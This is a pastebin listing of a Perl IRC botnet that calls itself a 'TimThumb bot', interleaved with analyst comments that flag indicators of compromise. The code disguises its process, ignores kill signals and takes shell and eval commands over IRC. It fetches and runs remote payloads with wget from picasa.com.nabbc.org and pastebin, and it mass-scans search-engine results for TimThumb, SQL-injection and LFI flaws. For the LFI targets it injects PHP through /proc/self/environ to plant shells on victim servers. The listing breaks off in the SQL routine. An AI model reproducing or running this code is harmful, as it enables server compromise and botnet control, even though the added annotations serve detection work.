sirnon

as

Apr 22nd, 2012
  1. #!/usr/bin/perl
  2. #################################################
  3. $powered="jembot"; #
  4. $mail="root@jem.bot"; #
  5. #################################################
  6. #################PERL MODULES####################
  7. use HTTP::Request; #
  8. use HTTP::Request::Common; #
  9. use HTTP::Request::Common qw(POST); #
  10. use LWP::Simple; #
  11. use LWP 5.53; #
  12. use LWP::UserAgent; #
  13. use Socket; #
  14. use IO::Socket; #
  15. use IO::Socket::INET; #
  16. use IO::Select; #
  17. use URI::URL; #
  18. ################BASIC CONNECTING#################
  # Analyst note: listing lines 19-59 are the bot's hard-coded configuration.
  # The host names, URLs, file names and strings below are this sample's own
  # values and double as indicators when searching logs or disks for it.
  19. my $datetime = localtime; #
  # Written into $0 on listing line 67, so process listings show this name
  # instead of the perl interpreter.
  20. my $fakeproc = "/usr/sbin/apache45"; #
  # Default IRC control server and port; listing line 66 lets the first
  # command-line argument replace the server name.
  21. my $ircserver = "irc.byroe.net"; #
  22. my $ircport = "6667"; #
  # Nick has the form ef-{N}, with N an integer from 0 to 99.
  23. my $nickname = "ef-{".int(rand(100))."}"; #
  # Sent in the USER registration line built in connector().
  24. my $ident = "HAcKeD"; #
  # Channel joined after the server's 001 welcome (see parse()).
  25. my $channel = "#non"; #
  # Used as a direct message target in lfi() and thumb(); how isAdmin() uses
  # it cannot be seen here because isAdmin is defined outside this view.
  26. my $admin = "Egypt-Hacker"; #
  27. my $fullname = "INFO"; #
  28. #################################################
  29. ####################LOGO####################################
  # Display prefixes for channel output. NOTE(review): the bare digits look
  # like IRC colour codes whose control bytes were lost in extraction.
  30. my $nob0dy = "15(9@13nob0dy15)"; #
  31. my $vulN = "15(9@6VuLn!15)"; #
  32. my $thumblogo = "15(9@11ThuMB15)"; #
  33. my $sqllogo = "15(9@11SQL15)"; #
  34. my $lfilogo = "15(9@11Lfi15)"; #
  35. ##################COMMAND####################################
  # Trigger words matched against channel messages in the main loop.
  36. my $thumbcmd = '!thumb'; #
  37. my $sqlcmd = '!sql'; #
  38. my $lficmd = '!lfi'; #
  39. ##################INJECTOR########################################
  # Remote payload locations. $thumbshell and $bot are passed as the src=
  # value in thumb(); $lfiinjector is used by lfi() and by the !respon check.
  # Outbound requests from a server to these URLs are a compromise signal.
  40. my $injector = "http://pastebin.com/raw.php?i=izAyQE2f"; #
  41. my $thumbshell = "http://picasa.com.nabbc.org/w00t.php"; #
  42. my $bot = "http://picasa.com.nabbc.org/bot.php"; #
  43. my $lfiinjector = "http://pastebin.com/raw.php?i=ukHveP61"; #
  44. my $shellbot = "http://picasa.com.nabbc.org/r0x"; #
  45. ##################################################################
  46. ########################################TIMTHUMB PATH#######################################################
  # Fixed file names that thumb() requests under cache/, temp/ and
  # wp-content/uploads/thumb-temp/ after its src= request. Files with these
  # names on a web server indicate it was targeted by this sample.
  47. my $folder1 = "/cache/35bac048e7c81f26c86c56ed8178e44f.php"; #
  48. my $folder2 = "/cache/external_35bac048e7c81f26c86c56ed8178e44f.php"; #
  49. my $folder3 = "/temp/35bac048e7c81f26c86c56ed8178e44f.php"; #
  50. my $folder4 = "/temp/external_35bac048e7c81f26c86c56ed8178e44f.php"; #
  51. my $folder5 = "/wp-content/uploads/thumb-temp/35bac048e7c81f26c86c56ed8178e44f.php"; #
  52. my $bot1 = "/cache/5291c5d1b8b6fb1c761b1e96b0c3f0ee.php"; #
  53. my $bot2 = "/cache/external_5291c5d1b8b6fb1c761b1e96b0c3f0ee.php"; #
  54. my $bot3 = "/temp/5291c5d1b8b6fb1c761b1e96b0c3f0ee.php"; #
  55. my $bot4 = "/temp/external_5291c5d1b8b6fb1c761b1e96b0c3f0ee.php"; #
  56. my $bot5 = "/wp-content/uploads/thumb-temp/5291c5d1b8b6fb1c761b1e96b0c3f0ee.php"; # #
  57. ############################################################################################################
  # The list holds a single User-Agent, so the random pick always returns it;
  # get_content() sends it on every request, which makes it usable for
  # filtering web-server access logs.
  58. my @uagents = ("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6");
  59. my $uagent = $uagents[rand(scalar(@uagents))];
  60.  
  # Start-up: ignore termination signals, disguise the process name, detach.
  # INT, HUP and TERM are ignored, so a plain kill (TERM) has no effect on the
  # process; SIGKILL cannot be ignored.
  61. $SIG{'INT'} = 'IGNORE';
  62. $SIG{'HUP'} = 'IGNORE';
  63. $SIG{'TERM'} = 'IGNORE';
  64. $SIG{'CHLD'} = 'IGNORE';
  # NOTE(review): 'PS' does not look like a standard signal name; this line is
  # presumably a no-op.
  65. $SIG{'PS'} = 'IGNORE';
  # Optional first argument replaces the configured control server.
  66. $ircserver = "$ARGV[0]" if $ARGV[0];
  # Process masquerading: $0 is overwritten with $fakeproc padded with NUL
  # bytes. For triage, compare the name shown by ps with the real executable
  # (/proc/<pid>/exe on Linux), which still points at the perl interpreter.
  67. $0 = "$fakeproc"."\0" x 16;;
  # Fork and let the parent exit, so the bot keeps running in the background.
  68. my $pid = fork;
  69. exit if $pid;
  70. die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);
  71.  
  # Connection state: %irc_servers is keyed by socket and $sel_client is the
  # select set polled in the main loop. %DCC and $dcc_sel are not used in the
  # part of the listing visible here.
  72. our %irc_servers;
  73. our %DCC;
  74. my $dcc_sel = new IO::Select->new();
  75. $sel_client = IO::Select->new();
  # sendraw([$socket,] $text): write one line to an IRC socket.
  # With two arguments the first is the socket; with one argument the line is
  # written to the global $IRC_cur_socket. The text is written as given plus
  # "\n"; nothing here filters line breaks embedded in the text.
  76. sub sendraw {
  77. if ($#_ == '1') {
  78. my $socket = $_[0];
  79. print $socket "$_[1]\n";
  80. } else {
  81. print $IRC_cur_socket "$_[0]\n";
  82. }
  83. }
  84.  
  # connector($nick, $server, $port): open the TCP connection to the IRC
  # server and register. Returns 1 when the connection cannot be opened.
  85. sub connector {
  86. my $mynick = $_[0];
  87. my $ircserver_con = $_[1];
  88. my $ircport_con = $_[2];
  89. my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
  90. if (defined($IRC_socket)) {
  # Make this socket the current one, add it to the select set and record
  # host, port, nick and the local address in %irc_servers.
  91. $IRC_cur_socket = $IRC_socket;
  92. $IRC_socket->autoflush(1);
  93. $sel_client->add($IRC_socket);
  94. $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
  95. $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
  96. $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  97. $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
  # nick() is defined outside this view.
  98. nick("$mynick");
  # Network signature: the USER line carries the configured ident, the local
  # socket address of the infected host and this fixed banner text.
  99. my $versi = "15[!]11TimThumB bot 04(09,01s4l1ty04) 15[!]";
  100. sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$versi");
  101. sleep (1);}}
  # parse($line): handle one protocol line from the IRC server (keep-alive,
  # nick tracking, registration). It reads and updates the globals $mynick,
  # $IRC_cur_socket and %irc_servers.
  102. sub parse {
  103. my $servarg = shift;
  # Keep-alive: the PING payload is echoed back in the PONG.
  104. if ($servarg =~ /^PING \:(.*)/) {
  105. sendraw("PONG :$1");
  106. }
  # NICK change that concerns the bot's own nick: remember the new one.
  107. elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
  108. if (lc($1) eq lc($mynick)) {
  109. $mynick = $4;
  110. $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  111. }
  112. }
  # Numeric 433 (nick in use): retry with a suffix; int rand(1) is always 0.
  113. elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
  114. nick("$mynick".int rand(1));
  115. }
  # Numeric 001 (welcome): store the nick and server name, set user modes
  # +iB, join the configured channel and post a fixed start-up message.
  # The MODE/JOIN/PRIVMSG sequence with this text is a usable signature.
  116. elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
  117. $mynick = $2;
  118. $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  119. $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
  120. sendraw("MODE $mynick +iB");
  121. sendraw("JOIN $channel");
  122. sleep(2);
  123. sendraw("PRIVMSG $channel :14[04!14]11TimhuMB BoT 09,01Up09...04!");
  124. }
  125. }
  # Main event loop. Reconnects until a server entry exists, polls the
  # sockets, handles PRIVMSG commands inline and then feeds complete lines to
  # parse(). The helpers isAdmin(), shell(), msg() and notice() are defined
  # outside this view.
  126. my $line_temp;
  127. while( 1 ) {
  128. while (!(keys(%irc_servers))) { &connector("$nickname", "$ircserver", "$ircport"); }
  129. select(undef, undef, undef, 0.01);;
  130. delete($irc_servers{''}) if (defined($irc_servers{''}));
  131. my @ready = $sel_client->can_read(0);
  132. next unless(@ready);
  133. foreach $fh (@ready) {
  134. $IRC_cur_socket = $fh;
  135. $mynick = $irc_servers{$IRC_cur_socket}{'nick'};
  136. $nread = sysread($fh, $ircmsg, 4096);
  # A zero-byte read means the server closed the connection: drop the socket
  # so the outer loop reconnects.
  137. if ($nread == 0) {
  138. $sel_client->remove($fh);
  139. $fh->close;
  140. delete($irc_servers{$fh});
  141. }
  142. @lines = split (/\n/, $ircmsg);
  143. $ircmsg =~ s/\r\n$//;
  144.  
  # NOTE(review): the PRIVMSG pattern is applied to the whole read buffer
  # ($ircmsg), not to the individual lines split out above.
  145. if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
  # $ident here is a new lexical that shadows the configured $ident.
  146. my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);
  147. my $engine ="GooGLe,ReDiff,Bing,ALtaViSTa,AsK,UoL,CluSty,GutSer,GooGle2,ExaLead,VirgiLio,WebDe,AoL,SaPo,DuCk,YauSe,BaiDu,KiPoT,GiBLa,YahOo,HotBot,LyCos,LyGo,BLacK,oNeT,SiZuka,WaLLa,DeMos,RoSe,SeZnaM,TisCali,NaVeR,DooGatE,sogou,interia,snz,yandex,joeant,terra,youdao,amfibi,bigclique,dancefloor,live,rakuten,biglobe,nova,najdi,goo,uksubmit,excite";
  # Branch 1: the message target is the bot's own nick (private message).
  # Every privileged command is gated only by isAdmin($nick), which receives
  # nothing but the sender's nick; the ident and host captured above are not
  # passed to it.
  148. if ($path eq $mynick) {
  149. if ($msg =~ /^PING (.*)/) {
  150. sendraw("NOTICE $nick :PING $1");
  151. }
  152. if ($msg =~ /^VERSION/) {
  153. sendraw("NOTICE $nick :VERSION TimThumb Bot scanner by s4l1ty");
  154. }
  155. if ($msg =~ /^TIME/) {
  156. sendraw("NOTICE $nick :TIME ".$datetime."");
  157. }
  158. if (&isAdmin($nick) && $msg eq "!die") {
  159. &shell("$path","kill -9 $$");
  160. }
  # Host artefacts of !killall: every perl process is killed, then a script
  # is fetched with wget into paste.jpg, run with perl and deleted. A perl
  # process executing a .jpg file is a useful detection point.
  161. if (&isAdmin($nick) && $msg eq "!killall") {
  162. &shell("$path","killall -9 perl;wget http://picasa.com.nabbc.org/r0x -O paste.jpg;perl paste.jpg;rm paste.jpg");
  163. }
  164. if (&isAdmin($nick) && $msg eq "!reset") {
  165. sendraw("QUIT :Restarting...");
  166. }
  167. if (&isAdmin($nick) && $msg eq "!rehash") {
  168. sendraw("QUIT : Rehasing...");
  169. &shell("$path","kill -9 $$;perl '.$0");
  170. }
  171. if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
  172. sendraw("JOIN #".$1);
  173. }
  174. if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
  175. sendraw("PART #".$1);
  176. }
  177. if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) {
  178. sendraw("NICK ".$1);
  179. }
  180. if (&isAdmin($nick) && $msg =~ /^!pid/) {
  181. sendraw($IRC_cur_socket, "PRIVMSG $nick :09Fake Process/PID :04 $fakeproc - 11,01$$");
  182. }
  # Any admin text that does not start with "!" is handed to shell().
  # shell() is outside this view; judging by the kill/wget strings passed to
  # it above, it presumably runs the text as a command on this host.
  183. if (&isAdmin($nick) && $msg !~ /^!/) {
  184. &shell("$nick","$msg");
  185. }
  186. }
  # Branch 2: the message was sent to a channel.
  187. else {
  188. if (&isAdmin($nick) && $msg eq "!die") {
  189. &shell("$path","kill -9 $$");
  190. }
  191. if (&isAdmin($nick) && $msg eq "!killall") {
  192. &shell("$path","killall -9 perl;wget http://picasa.com.nabbc.org/r0x -O paste.jpg;perl paste.jpg;rm paste.jpg");
  193. }
  194. if (&isAdmin($nick) && $msg eq "!reset") {
  195. sendraw("QUIT :Restarting...");
  196. }
  197. if (&isAdmin($nick) && $msg eq "!rehash") {
  198. sendraw("QUIT : Rehasing...");
  199. &shell("$path","kill -9 $$;perl '.$0");
  200. }
  201. if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
  202. sendraw("JOIN #".$1);
  203. }
  204. if (&isAdmin($nick) && $msg eq "!part") {
  205. sendraw("PART $path");
  206. }
  207. if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
  208. sendraw("PART #".$1);
  209. }
  210. if (&isAdmin($nick) && $msg =~ /^\.x (.*)/) {
  211. &shell("$path","$1");
  212. }
  213. if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {
  214. &shell("$path","$1");
  215. }
  # String eval of text received over IRC: Perl source supplied by the
  # remote party is executed inside the bot process.
  216. if (&isAdmin($nick) && $msg =~ /^!eval (.*)/) {
  217. eval "$1";
  218. }
  219.  
  220. ##################################################################### HELP COMMAND
  221.  
  # From here on most handlers carry no isAdmin() test, so any user able to
  # post in the channel can trigger them, including !port, !ip, !base64 and
  # the three scan commands further down.
  222. if ($msg=~ /^!help/) {
  223. my $helplogo = "15(14@03Help15";
  224. &msg("$path","$helplogo 15 #####################4[HELP]15##############################");
  225. &msg("$path","$helplogo 03 ( $sqlcmd [bug][dork] ) sql scan ");
  226. &msg("$path","$helplogo 03 ( $thumbcmd [bug][dork] ) TimThumb scan ");
  227. &msg("$path","$helplogo 03 ( $lficmd [bug][dork] ) TimThumb scan ");
  228. &msg("$path","$helplogo 15 6END HELP ===>");
  229. }
  230. if ($msg=~ /^!engine/) {
  231. my $enginelogo = "06(09@11eNgine6)";
  232. &msg("$path","$enginelogo 04GooGLe,Bing,ALtaViSTa,AsK,UoL,YahOo.");
  233. &msg("$path","$enginelogo 04Will Be Updated as soon");
  234. }
  235. if ($msg=~ /^!about/) {
  236. my $aboutlogo = "15(09@11About15)";
  237. &msg("$path","$aboutlogo 09,01Priv8 Bot 11v0.13");
  238. &msg("$path","$aboutlogo 09,01© Copy Right 2012 04s4l1ty");
  239. }
  240. if ($msg=~ /^!version/) {
  241. my $versionlogo = "15(09@11Version15)";
  242. &msg("$path","$versionlogo 13,11WordPress,Sql,Lfi 04fucker");
  243. }
  # !respon / !id: fetches $lfiinjector and reports whether the body contains
  # "str_rot13", i.e. whether the remote payload is still reachable.
  244. if ($msg=~ /^!respon/ || $msg=~ /^!id/) {
  245. if (&isFound($lfiinjector,"str_rot13")) {
  246. &msg("$path","15,1(9@11Injector15 => 4Ready!!!");
  247. } else {
  248. &msg("$path","15,01(09@11Injector15 => 12Undetected.");
  249. }
  250. }
  251. if (&isAdmin($nick) && $msg =~ /^!pid/) {
  252. &notice("$nick","PRIVMSG $nick :09Fake Process/PID :04 $fakeproc - 11,01$$");
  253. }
  254.  
  255. #####################################################################
  # !port: a single TCP connect (7 s timeout) from the infected host to a
  # host and port taken from the message; the result goes to the channel.
  256. if ($msg=~ /^!port\s+(.*?)\s+(.*)/ ) {
  257. my $hostip= "$1";
  258. my $portsc= "$2";
  259. my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $portsc, Proto =>'tcp', Timeout => 7);
  260. if ($scansock) {
  261. &msg("$path","15(9@11PORT15)7 $hostip : $portsc 9Accepted");
  262. }
  263. else {
  264. &msg("$path","15(9@11PORT15)7 $hostip : $portsc 4connection refused");
  265. }
  266. }
  267.  
  # !ip: POSTs the supplied address to a third-party geolocation page and
  # scrapes the reply. The nested fork is a double fork: the intermediate
  # child exits at once, so the worker runs detached from the main loop.
  268. if ($msg=~ /^!ip\s+(.*)/ ) {
  269. if (my $pid = fork) { waitpid($pid, 0); } else {
  270. if (fork) { exit; } else {
  271. my $ip = $1;
  272. &msg("$path","15(9@11IP15)7 Searching ".$ip." 6Location ...");
  273. my $website = "http://www.ipligence.com/geolocation";
  274. my ($useragent,$request,$response,%form);
  275. undef %form;
  276. $form{ip} = $ip;
  277. $useragent = LWP::UserAgent->new;
  278. $useragent->timeout(5);
  279. $request = POST $website,\%form;
  280. $response = $useragent->request($request);
  281. if ($response->is_success) {
  282. my $res = $response->content;
  283. if ($res =~ m/Your IP address is(.*)<br>City:(.*)<br\/>Country:(.*)<br>Continent:(.*)<br>Time/g) {
  284. my ($ipaddress,$city,$country,$continent) = ($1,$2,$3,$4);
  285. &msg("$path","15(9@11IP15)7IP Address : ".$ip."15 (9".$ipaddress."15 )");
  286. &msg("$path","15(9@11IP15)7 City : ".$ip."15 (9".$city."15 )");
  287. &msg("$path","15(9@11IP15)7 Country : ".$ip."15 (9".$country."15 )");
  288. &msg("$path","15(9@11IP15)7 Continent : ".$ip."15 (9".$continent."15 )");
  289. }
  290. else {
  291. &msg("$path","15(9@11IP15)7 ".$ip." 6not found in database");
  292. }
  293. }
  294. else {
  295. &msg("$path","15(9@11IP15)4 Cannot open IP database.");
  296. }
  297. }
  298. exit;
  299. }
  300. }
  301.  
  # NOTE(review): encode_base64/decode_base64 belong to MIME::Base64, which
  # is not among the `use` lines at the top of the listing; confirm whether
  # it is loaded elsewhere.
  302. if ($msg=~ /^!base64 (.*)$/ ) {
  303. if (my $pid = fork) { waitpid($pid, 0); } else {
  304. if (fork) { exit; } else {
  305. my $hash = $1;
  306. my $base64_encoded = encode_base64($hash);
  307. my $base64_decoded = decode_base64($hash);
  308. &msg("$path","15(9@11BASE6415)12 Decode : $base64_decoded");
  309. &msg("$path","15(9@11BASE6415)12 Encode : $base64_encoded");
  310. }
  311. exit;
  312. }
  313. }
  314. ##############################################################################
  315.  
  # Scan commands. Each takes "<bug> <dork>" from the message, announces the
  # job in the channel and starts the matching *_start routine in a detached
  # worker with a fixed list of search engines.
  316. if ($msg=~ /^$thumbcmd\s+(.+?)\s+(.*)/) {
  317. if (my $pid = fork) {
  318. waitpid($pid, 0);
  319. }
  320. else {
  321. if (fork) { exit; } else {
  322. my ($bug,$dork) = ($1,$2);
  323. &msg("$path","$thumblogo 6Dork :11 $dork");
  324. &msg("$path","$thumblogo 11Bugz :6 $bug");
  325. &msg("$path","$thumblogo 4Working.!!!");
  326. &timthumb_start($path,$bug,$dork,"GooGLe,AllTheWeb,Bing,ALtaViSTa,AsK,UoL,YahOo");
  327. }
  328. exit;
  329. }
  330. }
  331. #####################################################################
  332. if ($msg=~ /^$sqlcmd\s+(.+?)\s+(.*)/) {
  333. if (my $pid = fork) {
  334. waitpid($pid, 0);
  335. }
  336. else {
  337. if (fork) { exit; } else {
  338. my ($bug,$dork) = ($1,$2);
  339. &msg("$path","$sqllogo 6Dork :11 $dork");
  340. &msg("$path","$sqllogo 11Bugz :6 $bug");
  341. &msg("$path","$sqllogo 4Working.!!!");
  342. &sql_start($path,$bug,$dork,"GooGLe,AllTheWeb,Bing,ALtaViSTa,AsK,UoL,YahOo");
  343. }
  344. exit;
  345. }
  346. }
  347. #####################################################################
  348. if ($msg=~ /^$lficmd\s+(.+?)\s+(.*)/) {
  349. if (my $pid = fork) {
  350. waitpid($pid, 0);
  351. }
  352. else {
  353. if (fork) { exit; } else {
  354. my ($bug,$dork) = ($1,$2);
  355. &msg("$path","$lfilogo 6Dork :11 $dork");
  356. &msg("$path","$lfilogo 11Bugz :6 $bug");
  357. &msg("$path","$lfilogo 4Working.!!!");
  358. &lfi_start($path,$bug,$dork,"GooGLe,AllTheWeb,Bing,ALtaViSTa,AsK,UoL,YahOo");
  359. }
  360. exit;
  361. }
  362. }
  363. #####################################################################
  364.  
  365. }
  366. }
  367.  
  # Line reassembly: every complete line goes to parse(); a trailing partial
  # line is kept in $line_temp and prepended to the first line of the next
  # read.
  368. for(my $c=0; $c<= $#lines; $c++) {
  369. $line = $lines[$c];
  370. $line = $line_temp.$line if ($line_temp);
  371. $line_temp = '';
  372. $line =~ s/\r$//;
  373. unless ($c == $#lines) {
  374. parse("$line");
  375. } else {
  376. if ($#lines == 0) {
  377. parse("$line");
  378. } elsif ($lines[$c] =~ /\r$/) {
  379. parse("$line");
  380. } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
  381. parse("$line");
  382. } else {
  383. $line_temp = $line;
  384. }
  385. }
  386. }
  387. }
  388. }
  389. #########################################
  390. sub timthumb_start() {
  391. my $chan = $_[0];
  392. my $bug = $_[1];
  393. my $dork = $_[2];
  394. my $engine = $_[3];
  395. if ($engine =~ /google/i) {
  396. if (my $pid = fork) { waitpid($pid, 0); }
  397. else { if (fork) { exit; } else {
  398. &thumb($chan,$bug,$dork,"GooGLe");
  399. } exit; }
  400. }
  401. if ($engine =~ /alltheweb/i) {
  402. if (my $pid = fork) { waitpid($pid, 0); }
  403. else { if (fork) { exit; } else {
  404. &thumb($chan,$bug,$dork,"AllTheWeb");
  405. } exit; }
  406. }
  407. if ($engine =~ /bing/i) {
  408. if (my $pid = fork) { waitpid($pid, 0); }
  409. else { if (fork) { exit; } else {
  410. &thumb($chan,$bug,$dork,"Bing");
  411. } exit; }
  412. }
  413. if ($engine =~ /altavista/i) {
  414. if (my $pid = fork) { waitpid($pid, 0); }
  415. else { if (fork) { exit; } else {
  416. &thumb($chan,$bug,$dork,"ALtaViSTa");
  417. } exit; }
  418. }
  419. if ($engine =~ /ask/i) {
  420. if (my $pid = fork) { waitpid($pid, 0); }
  421. else { if (fork) { exit; } else {
  422. &thumb($chan,$bug,$dork,"AsK");
  423. } exit; }
  424. }
  425. if ($engine =~ /uol/i) {
  426. if (my $pid = fork) { waitpid($pid, 0); }
  427. else { if (fork) { exit; } else {
  428. &thumb($chan,$bug,$dork,"UoL");
  429. } exit; }
  430. }
  431. if ($engine =~ /yahoo/i) {
  432. if (my $pid = fork) { waitpid($pid, 0); }
  433. else { if (fork) { exit; } else {
  434. &thumb($chan,$bug,$dork,"YahOo");
  435. } exit; }
  436. }
  437. }
  438.  
  439. #########################################
  440. sub sql_start() {
  441. my $chan = $_[0];
  442. my $bug = $_[1];
  443. my $dork = $_[2];
  444. my $engine = $_[3];
  445. if ($engine =~ /google/i) {
  446. if (my $pid = fork) { waitpid($pid, 0); }
  447. else { if (fork) { exit; } else {
  448. &sql($chan,$bug,$dork,"GooGLe");
  449. } exit; }
  450. }
  451. if ($engine =~ /alltheweb/i) {
  452. if (my $pid = fork) { waitpid($pid, 0); }
  453. else { if (fork) { exit; } else {
  454. &sql($chan,$bug,$dork,"AllTheWeb");
  455. } exit; }
  456. }
  457. if ($engine =~ /bing/i) {
  458. if (my $pid = fork) { waitpid($pid, 0); }
  459. else { if (fork) { exit; } else {
  460. &sql($chan,$bug,$dork,"Bing");
  461. } exit; }
  462. }
  463. if ($engine =~ /altavista/i) {
  464. if (my $pid = fork) { waitpid($pid, 0); }
  465. else { if (fork) { exit; } else {
  466. &sql($chan,$bug,$dork,"ALtaViSTa");
  467. } exit; }
  468. }
  469. if ($engine =~ /ask/i) {
  470. if (my $pid = fork) { waitpid($pid, 0); }
  471. else { if (fork) { exit; } else {
  472. &sql($chan,$bug,$dork,"AsK");
  473. } exit; }
  474. }
  475. if ($engine =~ /uol/i) {
  476. if (my $pid = fork) { waitpid($pid, 0); }
  477. else { if (fork) { exit; } else {
  478. &sql($chan,$bug,$dork,"UoL");
  479. } exit; }
  480. }
  481. if ($engine =~ /yahoo/i) {
  482. if (my $pid = fork) { waitpid($pid, 0); }
  483. else { if (fork) { exit; } else {
  484. &sql($chan,$bug,$dork,"YahOo");
  485. } exit; }
  486. }
  487. }
  488.  
  489. #########################################
  490. sub lfi_start() {
  491. my $chan = $_[0];
  492. my $bug = $_[1];
  493. my $dork = $_[2];
  494. my $engine = $_[3];
  495. if ($engine =~ /google/i) {
  496. if (my $pid = fork) { waitpid($pid, 0); }
  497. else { if (fork) { exit; } else {
  498. &lfi($chan,$bug,$dork,"GooGLe");
  499. } exit; }
  500. }
  501. if ($engine =~ /alltheweb/i) {
  502. if (my $pid = fork) { waitpid($pid, 0); }
  503. else { if (fork) { exit; } else {
  504. &lfi($chan,$bug,$dork,"AllTheWeb");
  505. } exit; }
  506. }
  507. if ($engine =~ /bing/i) {
  508. if (my $pid = fork) { waitpid($pid, 0); }
  509. else { if (fork) { exit; } else {
  510. &lfi($chan,$bug,$dork,"Bing");
  511. } exit; }
  512. }
  513. if ($engine =~ /altavista/i) {
  514. if (my $pid = fork) { waitpid($pid, 0); }
  515. else { if (fork) { exit; } else {
  516. &lfi($chan,$bug,$dork,"ALtaViSTa");
  517. } exit; }
  518. }
  519. if ($engine =~ /ask/i) {
  520. if (my $pid = fork) { waitpid($pid, 0); }
  521. else { if (fork) { exit; } else {
  522. &lfi($chan,$bug,$dork,"AsK");
  523. } exit; }
  524. }
  525. if ($engine =~ /uol/i) {
  526. if (my $pid = fork) { waitpid($pid, 0); }
  527. else { if (fork) { exit; } else {
  528. &lfi($chan,$bug,$dork,"UoL");
  529. } exit; }
  530. }
  531. if ($engine =~ /yahoo/i) {
  532. if (my $pid = fork) { waitpid($pid, 0); }
  533. else { if (fork) { exit; } else {
  534. &lfi($chan,$bug,$dork,"YahOo");
  535. } exit; }
  536. }
  537. }
  538. #########################################
  # lfi($chan, $bug, $dork, $engine): for every host returned by
  # search_engine(), request "<host><bug>" followed by a long ../ run and
  # /proc/self/environ, and report hosts whose reply contains environment
  # variables. lfi_env_query() is defined outside this view.
  #
  # Detection points visible in this routine:
  #   - access-log entries with a long "../" run ending in
  #     "/proc/self/environ%0000", followed by a request for "/tmp/Crash%0000";
  #   - files /tmp/Crash and /tmp/w00t on the web server;
  #   - the reply markers "s4l1ty#...#s4l1ty" and "Hijacked by s4l1ty".
  539. sub lfi() {
  540. my $chan = $_[0];
  541. my $bug = $_[1];
  542. my $dork = $_[2];
  543. my $engine = $_[3];
  544. my $count = 0;
  545. my @list = &search_engine($chan,$bug,$dork,$engine,$lfilogo);
  546. my $num = scalar(@list);
  547. if ($num > 0) {
  548. foreach my $site (@list) {
  549. $count++;
  550. if ($count == $num-1) { &msg("$chan","$lfilogo15(9@7$engine15)10 Scan finish..."); }
  551. my $dir = "../../../../../../../../../../../../../../../";
  # $test is the URL actually requested; $vuln and $shell are only used in the
  # channel messages. NOTE(review): the "09"/"04" inside them look like
  # stripped IRC colour codes.
  552. my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";
  553. my $vuln = "http://".$site.$bug.$dir."09/proc/self/environ%0000";
  554. my $shell = "http://".$site.$bug.$dir."04/tmp/Crash%0000";
  555. my $html = get_content($test);
  # A reply containing both variables means the server returned the process
  # environment, including the request's User-Agent header.
  556. if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT=/) {
  557. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  # PHP source is base64-encoded and handed to lfi_env_query() together with
  # the test URL; how that helper delivers it cannot be seen from here.
  558. my $code = 'echo "s4l1ty#".php_uname()."#s4l1ty"; if(@copy("'.$lfiinjector.'","/tmp/Crash")) { echo "SUCCESS"; }';
  559. my $res = lfi_env_query($test,encode_base64($code));
  560. $res =~ s/\n//g;
  561. if ($res =~ /s4l1ty#(.*)#s4l1tySUCCESS/sg) {
  562. my $sys = $1;
  563. &msg("$chan","$lfilogo15(09@03$engine15)04 ".$shell." 15(9@3".$sys."15)$vulN");
  564. sleep(4);
  565. }
  566. elsif ($res =~ /s4l1ty#(.*)#s4l1ty/sg) {
  567. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  568. my $sys = $1;
  # Second attempt: the payload asks the server to fetch the files itself with
  # wget, so outbound wget from the web-server account is another signal.
  569. my $upload = 'system("wget '.$lfiinjector.' -O /tmp/Crash");';
  570. my $upload1 = 'system("wget '.$botshell.' -O /tmp/w00t");';
  571. my $wget = lfi_env_query($test,encode_base64($upload)); sleep(2);
  572. my $wget1 = lfi_env_query($test,encode_base64($upload1)); sleep(2);
  573. my $check = get_content("http://".$site.$bug.$dir."/tmp/Crash%0000"); sleep(1);
  574. if ($check =~ /Hijacked by s4l1ty/) {
  575. &msg("$admin","$lfilogo15(09@03$engine15)04 ".$shell." 15(9@3".$sys."15)$vulN");
  576. sleep(2);
  577. }
  578. else {
  579. &msg("$chan","$lfilogo15(09@3$engine15)15(09@04SysTem15)4 ".$vuln." 15(09@03".$sys."15)$vulN");
  580. sleep(2);
  581. }
  582. } exit; }
  583. }
  584. else { &msg("$chan","$lfilogo15(09@3$engine15)15(09@06eNviRon15)06 ".$vuln.""); }
  585. } exit; } sleep(2);
  586. }
  587. }
  588. }
  589. }
  590. #########################################
  # sql($chan, $bug, $dork, $engine): for every host returned by
  # search_engine(), request "<host><bug>" with a single quote appended and
  # classify the reply by well-known database error strings. It only reports
  # matches to the channel; nothing else is sent to the target here.
  # Detection point: a burst of requests ending in "'" that carry the fixed
  # User-Agent set in get_content().
  591. sub sql() {
  592. my $chan = $_[0];
  593. my $bug = $_[1];
  594. my $dork = $_[2];
  595. my $engine = $_[3];
  596. my $count = 0;
  597. my @list = &search_engine($chan,$bug,$dork,$engine,$sqllogo);
  598. my $num = scalar(@list);
